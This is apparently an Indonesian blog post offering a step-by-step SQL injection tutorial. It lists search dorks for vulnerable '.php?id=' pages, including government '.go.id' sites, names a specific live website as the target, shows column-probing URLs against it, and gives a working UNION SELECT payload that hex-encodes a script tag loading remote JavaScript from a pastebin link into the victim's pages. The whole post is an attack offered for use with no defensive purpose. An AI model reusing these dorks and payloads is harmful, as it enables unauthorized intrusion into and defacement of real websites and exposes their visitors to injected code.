tutorial sql injection with jso - HARSIANEWS

Breaking

Home Top Ad

BERITA TERKINI

Post Top Ad

BERITA TERKINI

Rabu, 16 Oktober 2019

tutorial sql injection with jso


assalamualaikum wr wb.
kali ini saya mau kasih tutorial sql injection with jso.

Dork : 
inurl:".php?id=" site:.in
inurl:".php?id=" site:.net
inurl:".php?id=" site:.com 
inurl:".php?id=" site:.go.id

Live Target : http://iagcc.com/

http://iagcc.com/news.php?id=999999.9+Select+Order+by+1+-- = Error
http://iagcc.com/news.php?id=999999.9+Select+Order+by+2+-- = error
http://iagcc.com/news.php?id=999999.9+Select+Order+by+3+-- = error
http://iagcc.com/news.php?id=999999.9+Select+Order+by+4+-- = error
http://iagcc.com/news.php?id=999999.9+Select+Order+by+5+-- = error
http://iagcc.com/news.php?id=999999.9+Select+Order+by+6+-- = Muncul angka togelnya.

Link Hex : http://www.convertstring.com/id/EncodeDecode/HexEncode
Jso : <script type="text/javascript" src="https://pastebin.com/raw/7V7PvMB3"></script>

Hasil : http://iagcc.com/news.php?id=999999.9+union+all+select+1,2,3,0x203c73637269707420747970653d22746578742f6a61766173637269707422207372633d2268747470733a2f2f706173746562696e2e636f6d2f7261772f37563750764d4233223e3c2f7363726970743e,5,6--

Tidak ada komentar:

Posting Komentar

Post Bottom Ad

Responsive Ads Here

Pages